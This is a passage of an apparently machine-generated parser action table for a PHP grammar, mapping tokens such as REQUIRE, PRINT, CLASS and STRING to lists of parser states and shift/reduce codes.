8,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,63,-3,-2,-4,-5,-6,63,-50,-443,63,63,63,63,63,-47,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-443,63,63,-23,63,-48,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-38,-40,-42,-443,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,-8,-443,63,-30,-22,-24,-25,-26,63,-11,-12,63,63,-39,-41,-43,-44,63,-45,-46,63,63,-56,63,63,63,63,63,63,63,63,-7,63,-9,63,63,-28,63,63,63,63,63,63,63,-443,63,63,63,63,63,63,63,-10,-29,-443,-443,63,63,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,63,63,63,-27,-443,-62,63,63,63,-51,-55,63,-110,63,63,-31,-64,63,-34,63,-85,63,-443,-443,-443,-109,63,-65,-71,63,-36,-83,-443,-443,-92,-93,-86,-87,63,-61,63,63,63,-443,-35,-76,-443,63,-443,63,-88,-54,-108,63,-32,63,63,63,-63,-84,-443,-443,-77,63,-443,63,-52,63,]),'INCLUDE_ONCE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,64,-3,-2,-4,-5,-6,64,-50,-443,64,64,64,64,64,-47,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,-443,64,64,-23,64,-48,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,-38,-40,-42,-443,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,-8,-443,64,-30,-22,-24,-25,-26,64,-11,-12,64,64,-39,-41,-43,-44,64,-45,-46,64,64,-56,64,64,64,64,64,64,64,64,-7,64,-9,64,64,-28,64,64,64,64,64,64,64,-443,64,64,64,64,64,64,64,-10,-29,-443,-443,64,64,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,64,64,64,-27,-443,-62,64,64,64,-51,-55,64,-110,64,64,-31,-64,64,-34,64,-85,64,-443,-443,-443,-109,64,-65,-71,64,-36,-83,-443,-443,-92,-93,-86,-87,64,-61,64,64,64,-443,-35,-76,-443,64,-443,64,-88,-54,-108,64,-32,64,64,64,-63,-84,-443,-443,-77,64,-443,64,-52,64,]),'REQUIRE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,65,-3,-2,-4,-5,-6,65,-50,-443,65,65,65,65,65,-47,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,-443,65,65,-23,65,-48,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,-38,-40,-42,-443,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,-8,-443,65,-30,-22,-24,-25,-26,65,-11,-12,65,65,-39,-41,-43,-44,65,-45,-46,65,65,-56,65,65,65,65,65,65,65,65,-7,65,-9,65,65,-28,65,65,65,65,65,65,65,-443,65,65,65,65,65,65,65,-10,-29,-443,-443,65,65,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,65,65,65,-27,-443,-62,65,65,65,-51,-55,65,-110,65,65,-31,-64,65,-34,65,-85,65,-443,-443,-443,-109,65,-65,-71,65,-36,-83,-443,-443,-92,-93,-86,-87,65,-61,65,65,65,-443,-35,-76,-443,65,-443,65,-88,-54,-108,65,-32,65,65,65,-63,-84,-443,-443,-77,65,-443,65,-52,65,]),'REQUIRE_ONCE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,66,-3,-2,-4,-5,-6,66,-50,-443,66,66,66,66,66,-47,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,-443,66,66,-23,66,-48,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,-38,-40,-42,-443,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,66,-8,-443,66,-30,-22,-24,-25,-26,66,-11,-12,66,66,-39,-41,-43,-44,66,-45,-46,66,66,-56,66,66,66,66,66,66,66,66,-7,66,-9,66,66,-28,66,66,66,66,66,66,66,-443,66,66,66,66,66,66,66,-10,-29,-443,-443,66,66,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,66,66,66,-27,-443,-62,66,66,66,-51,-55,66,-110,66,66,-31,-64,66,-34,66,-85,66,-443,-443,-443,-109,66,-65,-71,66,-36,-83,-443,-443,-92,-93,-86,-87,66,-61,66,66,66,-443,-35,-76,-443,66,-443,66,-88,-54,-108,66,-32,66,66,66,-63,-84,-443,-443,-77,66,-443,66,-52,66,]),'PRINT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,68,-3,-2,-4,-5,-6,68,-50,-443,68,68,68,68,68,-47,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,-443,68,68,-23,68,-48,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,-38,-40,-42,-443,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,68,-8,-443,68,-30,-22,-24,-25,-26,68,-11,-12,68,68,-39,-41,-43,-44,68,-45,-46,68,68,-56,68,68,68,68,68,68,68,68,-7,68,-9,68,68,-28,68,68,68,68,68,68,68,-443,68,68,68,68,68,68,68,-10,-29,-443,-443,68,68,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,68,68,68,-27,-443,-62,68,68,68,-51,-55,68,-110,68,68,-31,-64,68,-34,68,-85,68,-443,-443,-443,-109,68,-65,-71,68,-36,-83,-443,-443,-92,-93,-86,-87,68,-61,68,68,68,-443,-35,-76,-443,68,-443,68,-88,-54,-108,68,-32,68,68,68,-63,-84,-443,-443,-77,68,-443,68,-52,68,]),'AT':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,69,-3,-2,-4,-5,-6,69,-50,-443,69,69,69,69,69,-47,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,-443,69,69,-23,69,-48,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,-38,-40,-42,-443,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,69,-8,-443,69,-30,-22,-24,-25,-26,69,-11,-12,69,69,-39,-41,-43,-44,69,-45,-46,69,69,-56,69,69,69,69,69,69,69,69,-7,69,-9,69,69,-28,69,69,69,69,69,69,69,-443,69,69,69,69,69,69,69,-10,-29,-443,-443,69,69,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,69,69,69,-27,-443,-62,69,69,69,-51,-55,69,-110,69,69,-31,-64,69,-34,69,-85,69,-443,-443,-443,-109,69,-65,-71,69,-36,-83,-443,-443,-92,-93,-86,-87,69,-61,69,69,69,-443,-35,-76,-443,69,-443,69,-88,-54,-108,69,-32,69,69,69,-63,-84,-443,-443,-77,69,-443,69,-52,69,]),'LPAREN':([0,2,3,4,5,6,7,8,9,10,12,13,16,18,19,20,21,22,23,24,25,28,29,30,32,33,34,35,41,42,44,45,46,47,48,49,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,82,83,100,101,102,104,106,107,110,111,114,116,117,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,183,184,185,191,192,193,194,195,196,197,198,199,200,201,202,205,206,207,208,209,212,213,214,218,229,234,245,246,251,259,265,267,268,269,270,271,274,275,276,277,278,279,285,286,287,288,289,290,291,292,294,295,300,301,302,303,304,305,336,338,345,346,347,348,351,352,355,356,360,361,364,375,389,392,396,404,407,408,418,423,425,426,428,429,430,431,432,441,442,443,444,446,449,457,467,468,477,479,481,482,485,487,488,489,490,500,501,527,528,529,530,531,532,541,542,543,556,557,559,560,563,564,565,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,618,620,621,622,627,630,634,636,637,638,639,640,657,675,676,679,682,693,698,701,703,734,735,740,741,742,746,748,759,760,762,763,767,776,789,791,792,803,806,811,812,813,814,817,818,820,822,825,826,832,835,836,841,854,856,860,861,862,864,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,895,907,908,909,910,911,912,913,914,915,917,918,923,924,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,9,-3,-2,-4,-5,-6,108,9,-50,119,-443,129,159,9,161,162,163,9,9,9,9,-47,179,9,182,-443,-429,9,217,218,9,9,9,9,9,9,9,9,9,9,9,9,9,244,245,246,9,9,9,9,251,9,9,-342,-343,-250,-226,265,-228,-237,-239,-443,-190,-443,-429,-430,9,9,-23,9,-48,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,-38,-40,-42,-443,365,-167,-168,9,9,9,9,9,9,9,9,9,9,9,9,9,389,-185,-186,-187,-192,-225,-228,9,119,-228,9,9,9,425,9,9,9,-227,9,-228,365,-8,-443,9,444,-428,-30,-22,-24,-25,-26,448,9,-11,457,-12,479,-443,-244,-248,9,-250,9,488,-39,-41,-43,-44,9,-45,-46,9,9,-56,504,9,9,-188,533,9,9,425,479,9,9,556,557,9,559,560,9,-7,9,-9,9,9,-28,457,602,457,9,9,-243,-245,9,9,9,9,9,-443,9,-229,9,-189,-443,-230,9,444,556,559,9,9,9,9,-235,-236,-240,-10,-29,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,457,-443,-443,9,9,-249,-33,-70,-443,752,-37,-49,-443,-53,-57,-60,-443,-111,-191,-194,9,9,9,803,806,-27,457,457,-443,-62,9,9,9,-51,831,-55,9,837,-110,-231,-193,-232,9,9,-31,861,-64,9,-246,-247,-34,9,-85,9,-443,-443,-443,-109,-195,479,457,9,-65,907,-71,9,-36,-83,-443,-443,-92,-93,-86,-87,9,-61,9,9,457,927,9,-443,-35,-76,-443,9,-443,9,-88,-54,-108,944,457,9,-32,9,9,9,-63,-84,-443,-443,-77,9,-443,9,-52,9,]),'CLASS':([0,2,3,4,5,6,7,10,13,29,71,72,114,120,121,130,164,166,168,180,260,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,500,566,570,608,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,820,825,832,835,836,841,862,867,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,70,-3,-2,-4,-5,-6,-50,-443,-47,254,255,-443,70,-23,-48,-38,-40,-42,-443,427,-8,-443,70,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,70,-56,-7,70,-9,-28,-443,-10,-29,427,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,70,70,-51,-55,70,-110,-31,-64,-34,-85,-443,-443,-443,-109,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,70,-61,70,70,-443,-35,-76,-443,70,-443,70,-88,-54,-108,-32,70,70,70,-63,-84,-443,-443,-77,70,-443,70,-52,70,]),'ABSTRACT':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,373,441,442,443,449,500,519,522,523,566,570,613,614,620,621,622,630,634,636,637,638,639,640,650,654,655,657,658,662,665,666,667,668,669,670,671,672,703,740,741,742,746,759,762,763,774,776,777,788,811,813,820,825,832,835,836,841,844,849,853,862,867,869,870,871,874,875,876,877,878,881,882,883,884,890,893,908,909,910,911,912,913,914,915,917,918,930,935,937,938,940,946,951,954,955,962,963,964,966,967,968,972,973,974,975,977,],[-443,71,-3,-2,-4,-5,-6,-50,-443,-47,-443,71,-23,-48,-38,-40,-42,-443,-8,-443,71,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,71,-56,-443,-7,71,-9,-28,-443,-443,668,-130,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-443,668,-136,-111,-129,668,-159,-163,-164,-165,-166,-160,-161,-162,-27,-443,-62,71,71,-51,-55,71,668,-110,-135,-158,-31,-64,-34,-85,-443,-443,-443,-109,-139,-132,-134,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,71,-61,71,71,-138,-141,-443,-35,-76,-443,71,-443,71,-88,-54,-108,-133,-32,71,71,71,-140,-63,-84,-443,-443,-77,71,-131,-443,-157,71,-52,-137,71,-156,]),'FINAL':([0,2,3,4,5,6,7,10,13,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,373,441,442,443,449,500,519,522,523,566,570,613,614,620,621,622,630,634,636,637,638,639,640,650,654,655,657,658,662,665,666,667,668,669,670,671,672,703,740,741,742,746,759,762,763,774,776,777,788,811,813,820,825,832,835,836,841,844,849,853,862,867,869,870,871,874,875,876,877,878,881,882,883,884,890,893,908,909,910,911,912,913,914,915,917,918,930,935,937,938,940,946,951,954,955,962,963,964,966,967,968,972,973,974,975,977,],[-443,72,-3,-2,-4,-5,-6,-50,-443,-47,-443,72,-23,-48,-38,-40,-42,-443,-8,-443,72,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,72,-56,-443,-7,72,-9,-28,-443,-443,669,-130,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-443,669,-136,-111,-129,669,-159,-163,-164,-165,-166,-160,-161,-162,-27,-443,-62,72,72,-51,-55,72,669,-110,-135,-158,-31,-64,-34,-85,-443,-443,-443,-109,-139,-132,-134,-65,-71,-36,-83,-443,-443,-92,-93,-86,-87,72,-61,72,72,-138,-141,-443,-35,-76,-443,72,-443,72,-88,-54,-108,-133,-32,72,72,72,-140,-63,-84,-443,-443,-77,72,-131,-443,-157,72,-52,-137,72,-156,]),'QUOTE':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,35,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,76,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,186,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,257,258,265,267,268,270,275,276,277,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,366,375,389,404,407,420,421,422,423,425,429,432,441,442,443,444,446,449,455,456,457,460,468,477,479,485,487,488,489,490,500,501,503,528,532,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,599,602,613,614,616,617,620,621,622,630,634,636,637,638,639,640,646,657,679,682,691,692,693,694,703,734,735,740,741,742,746,748,759,762,763,764,771,773,776,799,803,806,811,813,814,820,822,825,826,832,835,836,839,841,851,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,894,901,907,908,909,910,911,912,913,914,915,917,918,924,928,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,76,-3,-2,-4,-5,-6,76,-50,-443,76,76,76,76,76,-47,76,186,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,-443,-443,76,76,-23,76,-48,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,-38,-40,-42,-443,-443,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,419,-432,76,76,76,76,-8,-443,76,-30,-22,-24,-25,-26,76,-11,460,-12,76,76,-39,-41,-43,-44,76,-45,460,-46,76,76,-56,511,76,76,76,76,-431,-433,-434,76,76,76,76,-7,76,-9,76,76,-28,460,460,460,598,460,76,76,76,76,76,76,76,-443,76,460,76,76,76,76,76,76,-10,-29,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,460,729,460,-443,-443,76,76,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,460,-111,76,76,-436,-437,76,-439,-27,460,460,-443,-62,76,76,76,-51,-55,76,460,460,460,-110,-435,76,76,-31,-64,76,-34,76,-85,76,-443,-443,-443,460,-109,460,460,76,-65,-71,76,-36,-83,-443,-443,-92,-93,-86,-87,76,-61,76,76,460,-438,76,-443,-35,-76,-443,76,-443,76,-88,-54,-108,460,460,76,-32,76,76,76,-63,-84,-443,-443,-77,76,-443,76,-52,76,]),'STRING':([0,2,3,4,5,6,7,9,10,11,13,14,15,19,23,24,25,28,29,32,34,36,37,38,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,70,81,114,115,118,119,120,121,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,182,183,184,185,191,192,193,194,195,196,197,198,199,200,201,202,205,210,217,218,222,230,244,245,246,251,254,255,256,260,261,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,293,294,295,296,297,304,336,345,346,347,348,351,352,354,355,356,360,361,365,369,371,375,389,393,394,404,407,409,410,411,423,424,425,429,432,441,442,443,444,446,449,455,456,457,465,468,476,477,479,485,487,488,489,490,491,499,500,501,502,503,504,513,517,528,532,533,535,537,540,545,550,551,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,601,602,608,609,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,653,656,657,661,670,671,672,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,776,781,782,784,790,796,797,803,806,811,813,814,820,822,825,826,831,832,835,836,839,841,842,845,848,851,852,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,889,892,894,898,899,907,908,909,910,911,912,913,914,915,917,918,924,925,927,928,931,934,935,937,938,940,944,949,950,951,954,955,961,962,963,964,967,969,971,972,973,975,976,],[-443,35,-3,-2,-4,-5,-6,35,-50,116,-443,124,116,35,35,35,35,35,-47,35,-443,188,189,190,116,35,35,35,35,35,35,116,116,35,35,35,35,35,35,35,35,35,35,35,35,35,35,-112,116,-443,116,279,35,35,-23,116,35,-48,303,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,35,-38,-40,-42,116,116,-443,363,364,-167,-168,35,35,35,35,35,35,35,35,35,35,35,35,35,116,116,35,116,116,116,35,35,35,-113,-114,303,426,430,35,35,35,35,-8,-443,35,116,-30,-22,-24,-25,-26,35,-11,124,452,-12,116,475,35,35,-39,-41,-43,-44,35,-45,452,-46,35,35,-56,116,116,116,35,35,116,303,35,35,116,542,543,35,116,35,35,35,-7,35,-9,35,35,-28,452,452,452,116,452,612,35,35,35,35,35,35,35,116,116,-443,35,641,452,116,116,116,35,35,116,116,116,116,116,689,691,35,35,35,35,-10,-29,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,452,116,452,736,737,-443,-443,35,35,-33,-70,-443,116,-37,-49,-443,-53,-57,-60,-443,116,452,116,116,-111,116,-160,-161,-162,35,35,35,-27,452,452,-443,-62,35,35,35,116,116,-51,-55,35,452,452,452,-110,116,847,-443,303,116,303,35,35,-31,-64,35,-34,35,-85,35,116,-443,-443,-443,452,-109,-443,891,895,452,-443,452,35,-65,-71,35,-36,-83,-443,-443,-92,-93,-86,-87,35,-61,35,35,923,-443,452,933,-123,35,-443,-35,-76,-443,35,-443,35,-88,-54,-108,452,933,116,452,-122,35,-32,35,35,35,116,959,960,-63,-84,-443,970,-443,-77,35,-443,-126,-128,35,-52,35,-127,]),'STRING_VARNAME':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,180,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,275,276,277,285,286,287,288,289,291,292,295,304,336,345,346,347,348,351,352,355,356,360,361,375,389,404,407,423,425,429,432,441,442,443,444,446,449,477,479,485,487,488,489,490,500,501,528,532,556,557,559,560,566,570,613,614,616,617,620,621,622,630,634,636,637,638,639,640,657,679,682,693,703,740,741,742,746,748,759,762,763,776,803,806,811,813,814,820,822,825,826,832,835,836,841,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,907,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,80,-3,-2,-4,-5,-6,80,-50,-443,80,80,80,80,80,-47,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,-443,80,80,-23,80,-48,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,-38,-40,-42,-443,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,-8,-443,80,-30,-22,-24,-25,-26,80,-11,-12,80,80,-39,-41,-43,-44,80,-45,-46,80,80,-56,80,80,80,80,553,80,80,80,-7,80,-9,80,80,-28,80,80,80,80,80,80,80,-443,80,80,80,80,80,80,80,-10,-29,-443,-443,80,80,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,80,80,80,-27,-443,-62,80,80,80,-51,-55,80,-110,80,80,-31,-64,80,-34,80,-85,80,-443,-443,-443,-109,80,-65,-71,80,-36,-83,-443,-443,-92,-93,-86,-87,80,-61,80,80,80,-443,-35,-76,-443,80,-443,80,-88,-54,-108,80,-32,80,80,80,-63,-84,-443,-443,-77,80,-443,80,-52,80,]),'NS_SEPARATOR':([0,2,3,4,5,6,7,9,10,11,12,13,15,19,23,24,25,28,29,32,35,40,41,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,112,113,114,116,117,119,120,121,127,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,209,211,217,218,222,229,231,244,245,246,251,259,265,267,268,270,275,276,277,278,279,284,285,286,287,288,289,291,292,294,295,296,298,304,336,345,346,347,348,351,352,354,355,356,360,361,365,369,371,375,389,392,404,407,408,423,424,425,429,432,441,442,443,444,446,449,452,455,456,457,464,466,467,468,477,479,485,487,488,489,490,491,499,500,501,503,504,513,516,518,528,529,532,533,535,537,540,541,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,600,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,652,656,657,661,679,682,693,703,730,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,775,776,781,796,803,806,811,813,814,820,822,825,826,831,832,835,836,839,841,851,852,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,892,894,898,899,907,908,909,910,911,912,913,914,915,917,918,924,925,927,928,931,933,934,935,937,938,940,944,951,954,955,962,963,964,967,969,971,972,973,975,976,],[-443,81,-3,-2,-4,-5,-6,81,-50,115,118,-443,128,81,81,81,81,81,-47,81,-429,210,81,-430,81,81,81,81,81,230,230,81,81,81,81,81,81,81,81,81,81,81,81,81,81,115,118,-443,-429,-430,81,81,-23,118,81,-48,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,81,-38,-40,-42,230,230,-443,81,81,81,81,81,81,81,81,81,81,81,81,81,118,393,230,81,230,118,409,230,81,81,81,118,81,81,81,81,-8,-443,81,118,-428,230,-30,-22,-24,-25,-26,81,-11,465,-12,128,118,81,81,-39,-41,-43,-44,81,-45,465,-46,81,81,-56,210,517,517,81,81,118,81,81,118,81,230,81,81,81,-7,81,-9,81,81,-28,-429,465,465,465,118,601,-430,465,81,81,81,81,81,81,81,230,230,-443,81,465,210,517,118,653,81,118,81,230,230,230,230,118,230,81,81,81,81,-10,-29,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,465,118,465,-443,-443,81,81,-33,-70,-443,230,-37,-49,-443,-53,-57,-60,-443,210,465,118,517,-111,517,81,81,81,-27,118,465,465,-443,-62,81,81,81,230,230,-51,-55,81,465,465,465,118,-110,517,230,81,81,-31,-64,81,-